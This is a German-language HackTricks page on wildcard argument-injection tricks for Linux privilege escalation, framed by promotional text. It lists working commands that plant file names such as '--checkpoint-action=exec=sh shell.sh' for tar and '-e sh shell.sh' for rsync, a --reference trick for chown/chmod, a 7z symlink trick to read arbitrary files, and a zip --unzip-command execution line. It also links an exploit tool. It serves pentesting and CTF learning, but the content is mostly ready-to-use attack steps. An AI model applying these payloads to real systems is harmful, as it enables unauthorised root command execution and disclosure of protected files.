Wildcards Spare tricks

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.

chown, chmod

Sie können angeben, welchen Dateibesitzer und welche Berechtigungen Sie für den Rest der Dateien kopieren möchten.

touch "--reference=/my/own/path/filename"

Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombinierter Angriff) ausnutzen. Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930

Tar

Beliebige Befehle ausführen:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack) ausnutzen. Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930

Rsync

Beliebige Befehle ausführen:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py ausnutzen (rsync-Angriff) Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930

7z

In 7z können Sie sogar mit -- vor * (beachten Sie, dass -- bedeutet, dass die folgende Eingabe nicht als Parameter behandelt werden kann, sondern nur als Dateipfade in diesem Fall) einen beliebigen Fehler verursachen, um eine Datei zu lesen. Wenn also ein Befehl wie der folgende von root ausgeführt wird:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Und Sie können Dateien im Ordner erstellen, in dem dies ausgeführt wird. Sie könnten die Datei @root.txt und die Datei root.txt erstellen, wobei root.txt ein Symbolischer Link auf die Datei ist, die Sie lesen möchten:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Dann, wenn 7z ausgeführt wird, behandelt es root.txt als eine Datei, die die Liste der Dateien enthält, die es komprimieren soll (das zeigt die Existenz von @root.txt an) und wenn 7z root.txt liest, liest es /file/you/want/to/read und da der Inhalt dieser Datei keine Liste von Dateien ist, wird ein Fehler angezeigt und der Inhalt wird angezeigt.

Weitere Informationen finden Sie in den Write-ups der Box CTF von HackTheBox.

Zip

Beliebige Befehle ausführen:

zip name.zip files -T --unzip-command "sh -c whoami"

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.

PreviousSSH Forward Agent exploitation NextUseful Linux Commands

Last updated 2 months ago